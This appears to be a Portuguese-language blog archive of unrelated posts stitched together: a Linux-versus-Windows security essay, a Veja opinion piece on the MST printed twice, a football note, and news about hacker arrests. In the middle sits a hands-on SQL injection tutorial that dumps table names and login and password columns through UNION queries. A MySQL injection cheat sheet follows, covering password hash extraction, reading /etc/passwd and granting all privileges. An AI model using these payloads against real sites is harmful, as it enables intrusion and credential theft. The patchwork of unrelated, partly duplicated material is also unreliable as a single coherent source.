Partindo de uma instalação padrão, ou seja, uma que até seu sobrinho nerd poderia fazer, num sistema GNU/Linux é difícil para um “usuário padrão”, mesmo com comportamentos de risco, tornar o sistema vulnerável, a ponto de ser comparado aos sistemas janelas. Para fazer isso, ele teria de ter certos conhecimentos técnicos. Seria necessário habilitar o login automático do usuário root (o que por si só já é uma proeza), abrir todas as portas TCP e UDP fechadas por padrão (e para isso teria de instalar pacotes que não são instalados e/ou configurados por padrão), desabilitar o pedido de senha para ações consideradas “administrativas”, e/ou alterar os privilégios de usuário comum. Isso é bem mais do que um “usuário padrão” faria no janelas. No janelas, em uma instalação padrão, o administrador do sistema é quase que sugerido como usuário padrão. Um usuário não precisa se esforçar muito para abrir as poucas defesas existentes. Isso, aliado à insegurança inerente e aos comportamentos de risco (clicar em links suspeitos de email, entrar em sites de reputação duvidosa, instalar programas piratas de origem duvidosa, utilizar programas de downloads como bitorrent ou semelhantes, desabilitar a proteção por senhas do sistema para alterações no registro, não instalar atualizações, não saber como utilizar um antivirus, não usar o firewall, senhas pequenas e óbvias, etc.), tornam o janelas um verdadeiro problema para que o usa e uma ótima oportunidade para quem quer invadi-lo.

A falácia dos antivírus.

A maior ilusão de um usuário do janelas é pensar que um antivírus o salvará das pragas da Internet. Para se beneficiar da proteção oferecida pelos antivírus, são necessárias três condições adicionais:

• Conhecimento técnico para sua correta configuração, atualização e utilização (o que muito poucos detém);
• Utilização de softwares complementares como firewall e antispyware (o que também exige conhecimento técnico);
• Comportamentos seguros na utilização da Internet (o que exige treinamento e capacitação).

Se qualquer um dos três requisitos não for atendido, todo o resto será comprometido, ou seja, as várias centenas de reais gastos com toda essa parafernália será, literalmente, inútil.

As empresas de segurança há anos fingem que são capazes de oferecer proteção para seus clientes, mas têm absoluta certeza de que isso é uma batalha perdida, portanto, a única razão para continuarem a oferecer “soluções de segurança” é a existência de uma massa enorme de pessoas que as compram acreditando que elas tornarão seu sistema seguro. They don’t give a damn, they just want the money.

Recentemente, Eva Chen, uma das fundadoras da Trend Micro, concedeu uma entrevista onde afirma que os crackers estão na dianteira e que a indústria de antivírus é uma piada (de mal gosto). Portanto, se nem eles acreditam que poderão ganhar o jogo, porque você, que é o elo mais fraco, se arriscaria a bancá-lo?

Conclusão.

Existem vírus para Linux? Sim, existem mas, na prática, são completamente irrelevantes, pois não só é difícil de encontrá-los, como seu impacto é irrisório.

Se você não acredita que é possível existir um sistema seguro que dificulta ao máximo a infecção por vírus, o uso não autorizado da sua máquina, seja por crackers, seja por “empresas idôneas”, e que tira das suas costas grande parte da responsabilidade sobre a segurança dos seus dados e arquivos, deveria experimentar o GNU/Linux ou outro sistema aberto, como o FreeBSD. Não se trata de militância ideológica a favor de sistemas livres. Trata-se de resguardar o que é seu, seu patrimônio, sua privacidade e sua liberdade. É uma questão prática, não filosófica.

Porque pagar, ou usar ilegalmente um sistema que, notoriamente, é problemático e o expõe a riscos, os quais você nem mesmo dá conta da existência, nem tem condições de se proteger, se é possível ter um sistema seguro e gratuito?

Por que pagar por softwares “tapa buraco”, como os antivírus, que tapam o sol como uma peneira, se é possível ter um sistema que não necessita desses paliativos?

Pense bem sobre isso. E depois considere usar uma distribuição GNU/Linux.

“Hoje, ao estado democrático cabe o monopólio da violência, inclusive para garantir o direito de propriedade. Os frutos do esforço individual pertencem aos que o empreendem”.

O ministro da Justiça, Tarso Genro, rotulou de tentativa de demonização as críticas ao Movimento dos Trabalhadores Rurais Sem Terra (MST) pela invasão e derrubada de laranjais em uma propriedade no estado de São Paulo. Ele condenou “aqueles que entendem que os movimentos sociais são caso de polícia”.
Nas democracias, cabe à polícia preservar a paz social e a obediência à lei, se preciso mediante o uso da força. Sir Richard Mayne (1796-1868), o primeiro chefe da polícia de Londres (1829), dizia que “o objetivo primeiro da uma polícia eficiente é a prevenção do crime; o segundo é a detenção e a punição dos criminosos”.
Para sir Richard, a missão da polícia estaria cumprida quando esta assegurasse “a proteção da vida e da propriedade, a tranquilidade pública e a contenção do crime”. Por essa visão, ainda atualíssima, a ação do MST é, sim, um caso de polícia.
O presidente do Supremo Tribunal Federal, Gilmar Mendes, entrou na discussão de forma precisa. “Não acredito que haja preocupação com a criminalização dos movimentos sociais. Agora, ato criminoso, praticado por qualquer pessoa, deve ser tratado como crime.” A invasão de propriedades – que o MST continuou a praticar – é crime inequívoco.
O direito de propriedade foi um dos maiores avanços da civilização. Sua criação, iniciada na Europa medieval, teve seu grande marco na Revolução Gloriosa inglesa de 1688, que aboliu o poder do rei para demitir juízes e confiscar bens. O Parlamento deu independência ao Judiciário e aprovou leis definindo direitos de propriedade.
Por essa época, as obsoletas instituições do feudalismo cederam lugar ao estado contemporâneo. A crescente complexidade da economia exigia a segurança que os barões feudais não podiam oferecer. As cidades, o novo centro econômico, precisavam de ordem. O uso da força requeria um poder central constituído.
Hoje, ao estado democrático cabe o monopólio da violência, inclusive para garantir o direito de propriedade. Os frutos do esforço individual pertencem aos que o empreendem, sem risco de confisco por reis absolutistas ou regimes autoritários. A polícia, uma organização do estado, zela pelo cumprimento da lei.
O estado se transformou, assim, no baluarte do direito de propriedade. A força é usada para defendê-lo, não para usurpá-lo. Essa nova realidade constituiu um dos elementos centrais da Revolução Industrial, com a qual a Inglaterra ascendeu à condição de maior potência econômica no século XIX.
O marxismo entendeu tudo isso ao contrário. A propriedade seria a fonte de todos os males. Seu respectivo direito não era defensável, pois significava “roubo”. Era preciso abolir a propriedade privada. O comunismo, fundado nesse equívoco conceitual, provocou o maior desastre social do século XX.
Alguns intelectuais emitiram manifesto em defesa do MST e com críticas à imprensa, talvez ainda influenciados pela utopia socialista. “A mídia foi taxativa em classificar a derrubada de alguns pés de laranja (foram 7 000!) como ato de vandalismo. Uma informação essencial, no entanto, foi omitida: a de que a titularidade das terras da empresa é contestada pelo Incra e pela Justiça.”
A Comissão Pastoral da Terra não deixou por menos. “Enquanto milhares de famílias sem terra continuam acampadas Brasil afora, grandes empresas praticam a grilagem e ainda conseguem cobertura do poder público.” Mais: “Por que a imprensa não dá destaque à grilagem da Cutrale?”. Nessa onda de absurdos, houve quem atribuísse aos movimentos sociais o direito de desobedecer à lei.
Manifestações de apoio à prática de atos criminosos do MST afrontam o estado de direito. Mesmo que as terras invadidas fossem griladas, a decisão de retomá-las teria de ser do Judiciário, não do MST. A violência, como dito, é monopólio do estado, não de uma organização que nem sequer existe formalmente.
O direito de propriedade é garantido pela Constituição (art. 5º, inciso XXII). A lei atribui ao Ministério da Justiça a “defesa da ordem jurídica, dos direitos políticos e das garantias constitucionais”. Assim, a ofensa àquele direito, especialmente por meio violento, é um caso de polícia, ainda que o titular da Pasta o negue.

MAILSON DA NÓBREGA
Ex-Ministro da Fazenda do Brasil (1987 – 1990)

________________________

Este artigo tem sua importância remetida ao fato de que o MST é um dos grandes entraves ao desenvolvimento econômico, em especial, agropecuário, do Rio Grande do Sul e outros estados. 

Ao meu ver, eles devem ser considerados criminosos, pois não passam disso, travestidos de movimento social. Por diversas vezes membros deste movimento invadiram e quebraram instalações agroindustriais, prejudicando imensamente e colocando em risco investimentos importantíssimos e vitais para a economia do Estado. Gilberto Simon.

[Quando o Movimento dos Trabalhadores Rurais Sem-Terra derrubaram aqueles pés de laranja em propriedades de outrem, muitos políticos, movidos pelo maldito espírito marxista que parece não querer sair do meio da sociedade, defenderam o ato de vandalismo. Maílson da Nóbrega, em artigo para a revista Veja dessa semana, publicou um ótimo artigo deixando bem claro que o MST é, sim, um caso de polícia. A ênfase que se dá não é para menos. Quando será que o princípio da propriedade privada será devidamente respeitado nesse país? A leitura é expressamente recomendada, especialmente para aqueles que não se conformam com a impunidade.]

Fonte: Veja.com

Maílson da Nóbrega

O ministro da Justiça, Tarso Genro, rotulou de tentativa de demonização as críticas ao Movimento dos Trabalhadores Rurais Sem Terra (MST) pela invasão e derrubada de laranjais em uma propriedade no estado de São Paulo. Ele condenou “aqueles que entendem que os movimentos sociais são caso de polícia”.

Nas democracias, cabe à polícia preservar a paz social e a obediência à lei, se preciso mediante o uso da força. Sir Richard Mayne (1796-1868), o primeiro chefe da polícia de Londres (1829), dizia que “o objetivo primeiro da uma polícia eficiente é a prevenção do crime; o segundo é a detenção e a punição dos criminosos”.

Para sir Richard, a missão da polícia estaria cumprida quando esta assegurasse “a proteção da vida e da propriedade, a tranquilidade pública e a contenção do crime”. Por essa visão, ainda atualíssima, a ação do MST é, sim, um caso de polícia.

O presidente do Supremo Tribunal Federal, Gilmar Mendes, entrou na discussão de forma precisa. “Não acredito que haja preocupação com a criminalização dos movimentos sociais. Agora, ato criminoso, praticado por qualquer pessoa, deve ser tratado como crime.” A invasão de propriedades – que o MST continuou a praticar – é crime inequívoco.

O direito de propriedade foi um dos maiores avanços da civilização. Sua criação, iniciada na Europa medieval, teve seu grande marco na Revolução Gloriosa inglesa de 1688, que aboliu o poder do rei para demitir juízes e confiscar bens. O Parlamento deu independência ao Judiciário e aprovou leis definindo direitos de propriedade.

Por essa época, as obsoletas instituições do feudalismo cederam lugar ao estado contemporâneo. A crescente complexidade da economia exigia a segurança que os barões feudais não podiam oferecer. As cidades, o novo centro econômico, precisavam de ordem. O uso da força requeria um poder central constituído.

Hoje, ao estado democrático cabe o monopólio da violência, inclusive para garantir o direito de propriedade. Os frutos do esforço individual pertencem aos que o empreendem, sem risco de confisco por reis absolutistas ou regimes autoritários. A polícia, uma organização do estado, zela pelo cumprimento da lei.

O estado se transformou, assim, no baluarte do direito de propriedade. A força é usada para defendê-lo, não para usurpá-lo. Essa nova realidade constituiu um dos elementos centrais da Revolução Industrial, com a qual a Inglaterra ascendeu à condição de maior potência econômica no século XIX.

O marxismo entendeu tudo isso ao contrário. A propriedade seria a fonte de todos os males. Seu respectivo direito não era defensável, pois significava “roubo”. Era preciso abolir a propriedade privada. O comunismo, fundado nesse equívoco conceitual, provocou o maior desastre social do século XX.

Alguns intelectuais emitiram manifesto em defesa do MST e com críticas à imprensa, talvez ainda influenciados pela utopia socialista. “A mídia foi taxativa em classificar a derrubada de alguns pés de laranja (foram 7 000!) como ato de vandalismo. Uma informação essencial, no entanto, foi omitida: a de que a titularidade das terras da empresa é contestada pelo Incra e pela Justiça.”

A Comissão Pastoral da Terra não deixou por menos. “Enquanto milhares de famílias sem terra continuam acampadas Brasil afora, grandes empresas praticam a grilagem e ainda conseguem cobertura do poder público.” Mais: “Por que a imprensa não dá destaque à grilagem da Cutrale?”. Nessa onda de absurdos, houve quem atribuísse aos movimentos sociais o direito de desobedecer à lei.

Manifestações de apoio à prática de atos criminosos do MST afrontam o estado de direito. Mesmo que as terras invadidas fossem griladas, a decisão de retomá-las teria de ser do Judiciário, não do MST. A violência, como dito, é monopólio do estado, não de uma organização que nem sequer existe formalmente.

O direito de propriedade é garantido pela Constituição (art. 5º, inciso XXII). A lei atribui ao Ministério da Justiça a “defesa da ordem jurídica, dos direitos políticos e das garantias constitucionais”. Assim, a ofensa àquele direito, especialmente por meio violento, é um caso de polícia, ainda que o titular da Pasta o negue.

Maílson da Nóbrega

“Revista Veja”, Edição 2139, pg. 86

Nação Tri-Mundial,

Acabo de receber a notícia que perdemos o mando de campo da partida contra o Sport, devido à invasão de campo no jogo contra o Inter.

O julgamento no STJD se encerrou agora.

Teremos que disputar a partida a 100 km da cidade de São Paulo.

Não vou tecer qualquer comentário no momento.

Confesso que esse assunto não me preocupava.

Agora, que é muito estranho, isso é.

O cidadão nem são-paulino era.

Invadiu o campo para protestar contra sua condição pessoal.

Não agrediu ninguém.

Foi prontamente preso pela Polícia.

Mas, enfim, prefiro aguardar para falar qualquer coisa.

aureliocamargo.blogdotrio@gmail.com

http://twitter.com/aureliocamargo

Então , como muitos sabem uma das falhas de programação web mais encontrada na internet é de banco de dados SQL .
O que posso dizer é que para explorar não necessita de um tipo especifico de requisição ( Post ou Get ) .

Portanto vamos ao tutorial :

Antes de mais nada não é necessariamente necessario algum erro de consulta para saber se esta realmente vul , e sim sua interpretação…

Erros de consultas no mysql_error() para possivelmente vuls , por exemplo :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/renan/public_html/noticias.php on line 211
&
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

No caso ah erro na consulta , mas não siginifica que em todos sites estaram mostrando .
Muitos dizem que só é possivel explorar caso lhe retorne algum erro , mas nem sempre é necessario…

<?php
$id = $_GET;
$q = "SELECT * FROM informativos WHERE id = '$id'";
$r = mysql_query($q) or die(mysql_error());
?>

#################################################

Vamos a pratica :
Se adicionarmos no final de um string uma simples aspas ela ira modificar a syntax retornando algum daqueles erros acima ou não modificaria a pagina.
Nossa query de consulta com aspas no fim da string de um site seria:
SELECT * FROM informativos WHERE id = '3''

Achando Colunas
Voce pode usar duas formas de achar as colunas , por “order by” ou “union+all+select+” .

No caso de “order by” voce fica procurando até aparecer o erro ” unknown column ‘5′ in ‘order clause’ ” .
Ja no ” union+all+select+ ” voce adicionaria o numero de strings que representa a qtd de colunas daquele query .
Exemplo
Aqui temos um site onde a quantidade de colunas nos retornara umas string na pagina .
www.site.com.br/informativos.php?id=3+union+all+select+1 Nada
www.site.com.br/informativos.php?id=3+union+all+select+1,2 Nada
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3 Nada
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4 Nada
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5 strings de ex 2,3 e 4

Mas em outros sites voce com esse mesmo tipo de consulta as colunas o erro seria :
” The used SELECT statements have a different number of columns “

——————————————————————–

Informações do host
version() => versão do MySQL
database() => nome do banco de dados da query
user() ou system_user() => usuario do banco de dados
now() => hora e data atual

Exemplo:
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,version(),5
5.0.54-log

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,database(),5
renan

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,user(),5
renan@10.5.3.31

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,now(),5
2009-08-28 23:19:41

--------------------------------------------------------------------

Achando Tabelas
Para se achar as colunas acho facil e voce ira compreender meu raciocineo.
Por exemplo voce poderia usar metodo de chute( brute ) de tabelas ou Dumpea-las , mas quando usa-las ?
A nossa resposta é de que versões anteriores do MySQL abaixo de 5.x.y não se pode dumpear então seria por chute , só que versões acima ou ela mesmo voce utiliza o metodo
de achar as colunas por meio de information_schema ( dumpear ) .

concat concatenar = colocar em ordem

group_concat() => busca tudo o que deseja juntamente com caracters em hexadecimal
concat() => busca o que deseja juntamente com caracters em hexadecimal
concat_ws() => une

-> No caso de chute ( brute ) voce utilizaria " +from+ :
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5+from+Renan

Se não houver a tabela de nome "Renan" ira nos retornar o erro " Table 'database.renan' doesn't exist "
Se houver nos retornaria a pagina com as mesmas strings de achado as colunas .

-> No caso de Dumpear :
Temos 2 jeitos bem faceis que voce pode escolher.

=====----------------------------------------------------=====

1º Metodo:
Nesse metodo as tabelas estam em hexadecimal.

renan_usuarios 0x72656e616e5f7573756172696f73

Temos então um site onde queremos pegar todas as tabelas .
www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(table_name),5
+from+information_schema.tables where table_schema=database()--
Retornaria-nos as seguintes tabelas postas na pagina :
adm_area,amado_agenda_fotos,amado_cadastros,amado_fotos,amado_usuarios,site_mp3,site_testemunhe,etc.

Comandos:
group_concat(table_name)
+from+information_schema.tables+where+table_schema=database()--

Agora temos de encontrar as colunas de uma determinada tabela .
www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(column_name),5
+from+information_schema.columns+where+table_name=0x72656e616e5f7573756172696f73
Retornaria-nos as seguintes colunas postas na pagina de uma tabela :
id,login,senha,email,status

Comandos:
group_concat(column_name)
+from+information_schema.column+where+table_schema=database()--

=====----------------------------------------------------=====

2º Metodo:
Nesse metodo as tabelas estam em decadecimal
Usaremos o limit que funcionara para selecionar as linhas conforme o database
+limit+0,1--
+limit+1,2--
+limit+2,1--
+limit+3,2--
+limit+4,3--
etc...

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(table_name),5
+from+information_schema.tables+limit+0,1--
Retornaria-nos a seguinte tabelas posta na pagina :
CHARACTER_SETS
Para poder achar as tabelas de logins voce alternaria o limit como acima.
Comandos:
concat(table_name)
+from+information_schema.tables+limit+0,1--

renan_usuarios char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(column_name),5
+from+information_schema.columns where table_name=
char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)+limit+0,1--
Retornaria-nos a seguinte coluna posta na pagina de uma tabela :
id
Para poder achar as colunas da tabela voce alternaria o limit como acima.
Comandos:
concat(column_name)
+from+information_schema.columns where table_name=char(tabela_em_decimal)+limit+0,1--

e por fim mostrando os dados de logins
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,
concat(login,0x20,senha),5+from+renan_usuarios

----------------------------------------------------------

Hexadecimal :
0x3a -> :
0x20 -> espaço
0x2d -> -
0x2b -> +

Voce pode utilizar ao invez de "+union+" :
/**/union/**/
+and+1=1+union+

www.site.com.br/informativos.php?id=3/**/union/**/all/**/select/**/1,2,3,concat(login,0x20,senha),5/**/from+renan_usuarios--

----------------------------------------------------------

Tutorial feito por Renan (or _Mlk_)

Referencias :
*Comments : http://dev.mysql.com/doc/
*Control Flows - http://dev.mysql.com/doc/refman/5.0/en/control-flow-functions.html
*MySQL Gotchas - http://sql-info.de/mysql/gotchas.htm
*Tonu SamuelNew SQL Injection Concept

Acabou,espero que gostaram da enrolação xD ...

#################################################

Tabela de Exemplos de Funções para Injeção

Version
SELECT @@version

Comments
SELECT 1; #comment
SELECT /*comment*/1;

Current User
SELECT user();
SELECT system_user();

List Users
SELECT user FROM mysql.user; -- priv

List Password Hashes
SELECT host, user, password FROM mysql.user; -- priv

List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database
SELECT database()

List Databases
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv

List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'

Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char
SELECT substr('abcd', 3, 1); # returns c

Bitwise AND
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char
SELECT char(65); # returns A

Char -> ASCII Value
SELECT ascii('A'); # returns 65

Casting
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);

String Concatenation
SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement
SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes
SELECT 0x414243; # returns ABC

Time Delay
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12

Local File Access
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system

Create Users
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users
DROP USER test1; -- priv

Make User DBA
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files
SELECT @@datadir;

Default/System Databases
information_schema (>= mysql 5.0)
mysql

Um programador de computador foi preso na noite de ontem após ter invadido o banco de dados de clientes da empresa Telefônica e disponibilizado as informações dos assinantes do Speedy na internet. Segundo a Secretaria de Segurança Pública, integrantes da Delegacia de Repressão a Crimes Cometidos por Meios Eletrônicos do Departamento de Investigações sobre o Crime Organizado (Deic), cumpriram o mandado de busca e apreensão na casa do hacker, em Itapevi, na Grande São Paulo. No local, os policiais apreenderam computadores pessoais e CDs, que serão periciados.

Além da invasão ao site da Telefônica, o programador impediu que alguns participantes do Campus Party 2008, um evento tecnológico, acessassem alguns sites. O acusado admitiu todas as invasões aos bancos de dados e foi preso pelo crime qualificado de divulgação de segredos. A pena é de um a quatro anos de prisão.

SÃO PAULO – PRISCILA TRINDADE – Agencia Estado

Quinta-feira, 20 de agosto de 2009,16:43

Link da reportagem aqui.

Um britânico acusado de entrar em redes de computadores da Nasa e na rede do Departamento de Defesa americano teve o recurso rejeitado e pode ser extraditado para os Estados Unidos para julgamento.

Gary McKinnon, de 42 anos, poderá ser condenado a 70 anos de prisão se for considerado culpado nos Estados Unidos de sabotar sistemas de defesa vitais.

As autoridades americanas acusam McKinnon de conseguir acesso a 97 computadores militares americanos e da Nasa a partir de sua casa em Londres entre os anos de 2001 e 2002, com a intenção de intimidar o governo dos Estados Unidos.

Segundo os promotores, McKinnon alterou e apagou arquivos em uma Estação Naval Aérea pouco tempo depois dos ataques de 11 de setembro de 2001, o que levou sistemas importantes a ficarem inoperantes.

McKinnon, que foi preso em 2002 e nunca foi acusado na Grã-Bretanha, admitiu que invadiu computadores nos Estados Unidos, mas afirmou que seus motivos eram inofensivos e inocentes.

Ele nega que tenha tentado sabotar os sistemas e diz que apenas queria encontrar provas da existência de Objetos Voadores Não Identificados (Ovnis) que, segundo ele, estariam sendo mantidos por autoridades americanas.

Recurso

Os advogados de McKinnon afirmaram que vão entrar com recurso na Corte Européia para que ele não seja extraditado.

McKinnon perdeu o primeiro caso em 2006 e decidiu entrar com recurso na Câmara dos Lordes, que no caso, funciona como o Supremo Tribunal Britânico.

O governo dos Estados Unidos alega que McKinnon cometeu a maior invasão de computadores militares da história.

“Gary McKinnon não é um terrorista e muito menos um simpatizante de terroristas. Seu caso poderia ser analisado de forma apropriada por nossas próprias autoridades”, afirmaram os advogados de McKinnon em uma declaração.

“Acreditamos que o governo britânico não o processou para que o governo americano faça dele um exemplo. Autoridades americanas envolvidas neste caso já declararam que querem vê-lo ‘fritar’”, acrescentaram.

Os Estados Unidos acusam McKinnon de, entre fevereiro de 2001 e março de 2002, ter invadido dezenas de computadores do Exército, Marinha, Força Aérea e Departamento de Defesa, além de 16 computadores da Nasa.

Nos últimos anos as autoridades americanas estão processando todos que invadem os computadores do governo ou do setor de defesa dos Estados Unidos.

Em 1997 dois adolescentes da Califórnia e três israelenses foram presos por invadirem os computadores do Pentágono. Naquele caso os três israelenses não foram extraditados, foram julgados em Israel.

Publicado em 31/07/2008, por Redacao TP.

Link da notícia aqui.

Responsável pela segurança de tecnologia do Brasil garante que sistema de controle da rede elétrica não tem acesso à web, mas admite possibilidade.

Governo minimiza possibilidade de ataque cibernético como causa do apagão – Segurança – IDG Now!.

Pois é, eu acredito que o sistema de gerenciamento não esteja conectado a redes vulneráveis ou à internet, porque já trabalhei em empresas que tinham a mesma preocupação com segurança, administrando justamente esse tipo de redes. Entretanto, é possível que estações individuais tenham acesso às duas redes, e também, que as redes sejam isoladas apenas logicamente, mas compartilhando switches e roteadores. Esses switches e roteadores são administrados através de uma rede que possui computadores que podem muito bem ter acesso à internet. Portanto, é possível um ataque que faça com que a divisão lógica da rede seja contornada, fazendo com que exista a possibilidade de invasão na rede “não conectada”. Entretanto, os níveis de segurança são tantos, as senhas são tantas, os dispositivos de detecção são tantos, a criptografia, etc. são tantos, que seria um trabalho enorme e de formiguinha fazê-lo. A não ser que fosse alguém com o conhecimento necessário para fazê-lo e aí, teria de ser alguém de dentro do sistema.